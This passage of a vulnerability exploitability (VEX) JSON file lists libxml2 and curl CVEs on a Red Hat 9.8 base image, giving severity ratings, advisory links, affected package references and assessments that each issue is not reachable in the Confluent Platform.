          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        674
      ],
      "description": "A flaw was found in libxml2, an XML parsing library. This uncontrolled recursion vulnerability occurs in the xmlCatalogXMLResolveURI function when an XML catalog contains a delegate URI entry that references itself. A remote attacker could exploit this configuration-dependent issue by providing a specially crafted XML catalog, leading to infinite recursion and call stack exhaustion. This ultimately results in a segmentation fault, causing a Denial of Service (DoS) by crashing affected applications.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0990"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7519"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0990"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429959"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/1018"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0990"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7974-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0990"
        }
      ],
      "published": "2026-01-15T15:15:52+00:00",
      "updated": "2026-06-30T20:18:46+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.9.13-14.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-0992",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        400
      ],
      "description": "A flaw was found in the libxml2 library. This uncontrolled resource consumption vulnerability occurs when processing XML catalogs that contain repeated <nextCatalog> elements pointing to the same downstream catalog. A remote attacker can exploit this by supplying crafted catalogs, causing the parser to redundantly traverse catalog chains. This leads to excessive CPU consumption and degrades application availability, resulting in a denial-of-service condition.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0992"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7519"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0992"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429975"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/1019"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0992"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7974-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0992"
        }
      ],
      "published": "2026-01-15T15:15:52+00:00",
      "updated": "2026-06-30T20:17:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.9.13-14.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-11352",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        835
      ],
      "description": "An issue in curl\u2019s QUIC UDP receive function allows a malicious HTTP/3 server\nto trigger a remote denial of service against a curl or libcurl client.\nBecause the helper function discards zero-length UDP datagrams before counting\nthem toward the per-call packet budget, a connected QUIC peer can continuously\nstream empty datagrams to indefinitely stall the client.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-11352"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-11352"
        },
        {
          "url": "https://curl.se/L7HzKXisfJ/CVE-2026-11352.md"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-11352.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-11352.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-qxwx-hr5v-h5q4"
        },
        {
          "url": "https://hackerone.com/reports/3783438"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11352"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8525-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-11352"
        }
      ],
      "published": "2026-07-03T07:16:23+00:00",
      "updated": "2026-07-07T18:01:19+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-11586",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        770
      ],
      "description": "By default, curl automatically responds to WebSocket PING frames. Because curl\nlacks an upper bound on memory allocation for unacknowledged frames, a\nmalicious server can exhaust all available memory by flooding curl with rapid,\nsequential PING messages.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-11586"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-11586"
        },
        {
          "url": "https://curl.se/L7HzKXisfJ/CVE-2026-11586.md"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-11586.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-11586.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-c68q-h477-5646"
        },
        {
          "url": "https://hackerone.com/reports/3788931"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11586"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8525-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-11586"
        }
      ],
      "published": "2026-07-03T07:16:23+00:00",
      "updated": "2026-07-07T17:59:46+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-11850",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        191
      ],
